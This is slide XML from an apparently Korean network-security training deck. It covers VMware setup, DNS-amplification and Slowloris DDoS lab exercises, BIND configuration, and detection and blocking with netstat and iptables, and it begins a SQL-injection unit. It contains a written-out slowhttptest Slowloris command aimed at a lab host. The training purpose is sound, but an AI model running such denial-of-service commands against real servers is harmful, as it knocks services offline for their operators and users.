            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 효과 확인을 위해 공격 대상 호스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(10.10.1.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>메시지 전송</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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>증폭 공격 수행</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5) ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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Ctrl + C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 공격 중지</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7) ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>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/Training/Unit/Net/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 14. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– DNS Amplification</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/Environ/VMware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>다운로드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>  접속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위 이미지 클릭하여 다운로드 진행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운로드 받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VMware-player-16.1.0-17198959.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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설치 진행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Next -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>동의 체크 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Next -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Workstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>system PATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>체크 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Next -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Next-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Next-&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Install</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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*  Ctrl + Alt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 누르면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 마우스 포인터가 빠져나올 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>named.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 수정 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>named.conf</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named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> | grep named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> | grep named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> | grep named</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/Training/Unit/Net/15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 15. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Slowloris</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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격서버에서 실습서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>slowhttptest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -c 4000 -g -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 10 -r 100 -t GET -x 3 -p 3 –u http://10.10.1.101 </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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2. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Net/15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 15. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Slowloris</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="1000" kern="0" spc="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공격이 들어오는지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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localhost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 시도</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>iptable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -A INPUT -s 10.10.1.166 -j DROP</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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> player </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 실행시킨다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</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player -&gt; file -&gt; open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>클릭후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ovf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>시킨다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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bash</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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>웹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 문제 리스트</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>실습 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Training/Unit/Web/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 1. SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>유형</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>iceweasel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>프로그램 실행</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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>인터넷 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
